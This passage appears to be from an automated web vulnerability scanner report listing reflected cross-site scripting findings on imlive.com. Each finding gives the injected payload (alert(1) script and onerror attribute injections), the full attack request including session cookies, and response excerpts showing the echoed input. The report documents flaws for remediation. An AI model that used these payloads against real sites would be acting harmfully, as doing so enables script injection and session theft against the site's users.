GET /awardarena/?c9ece"><a>e6c79bedc05=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:54 GMT Connection: close Content-Length: 25222 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/awardarena/?c9ece"><a>e6c79bedc05=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.481. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/awardarena/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d56'-alert(1)-'698666eeaa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /awardarena/?80d56'-alert(1)-'698666eeaa0=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:57 GMT Connection: close Content-Length: 25371 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/?80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47df2'onerror%3d'alert(1)'f893addb900 was submitted in the REST URL parameter 1. This input was echoed as 47df2'onerror='alert(1)'f893addb900 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /47df2'onerror%3d'alert(1)'f893addb900 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:12 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:11 GMT Connection: close Content-Length: 19702 Vary: Accept-Encoding
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
4.483. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/become_host.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c68'-alert(1)-'911a666a53f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /become_host.asp?15c68'-alert(1)-'911a666a53f=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:27 GMT Connection: close Content-Length: 21781 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ...[SNIP]...
4.484. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/become_host.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8175d"><a>ad0c10fb84f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /become_host.asp?8175d"><a>ad0c10fb84f=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:23 GMT Connection: close Content-Length: 21593 Vary: Accept-Encoding
4.485. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/becomehost.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae13c"><a>8ef4c400f3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /becomehost.aspx?ae13c"><a>8ef4c400f3a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:56 GMT Connection: close Content-Length: 21593 Vary: Accept-Encoding
4.486. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/becomehost.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbb67'-alert(1)-'15501fee645 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /becomehost.aspx?cbb67'-alert(1)-'15501fee645=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:59 GMT Connection: close Content-Length: 21781 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ...[SNIP]...
4.487. http://imlive.com/categoryfs.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/categoryfs.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1290d'><a>0243a0c9435 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /categoryfs.asp?cat=232&1290d'><a>0243a0c9435=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:30 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:30 GMT Connection: close Content-Length: 18966 Vary: Accept-Encoding
<html> <head> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title> <meta name="d ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232^1290d'><a>0243a0c9435=1&lr=1107816009&ud=0&pe=categoryfs.asp&qs=cat=232^1290d'> ...[SNIP]...
4.488. http://imlive.com/categoryms.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/categoryms.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61172'><a>3b9652ee722 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /categoryms.asp?cat=2&61172'><a>3b9652ee722=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:32 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:32 GMT Connection: close Content-Length: 21858 Vary: Accept-Encoding
<html> <head> <title>Mysticism & Spirituality Live Video Chat at ImLive</title> <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2^61172'><a>3b9652ee722=1&lr=1107816009&ud=0&pe=categoryms.asp&qs=cat=2^61172'> ...[SNIP]...
4.489. http://imlive.com/celebrity-porn-stars/celebrity-events/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/celebrity-porn-stars/celebrity-events/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db582'-alert(1)-'4b3c1d175fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
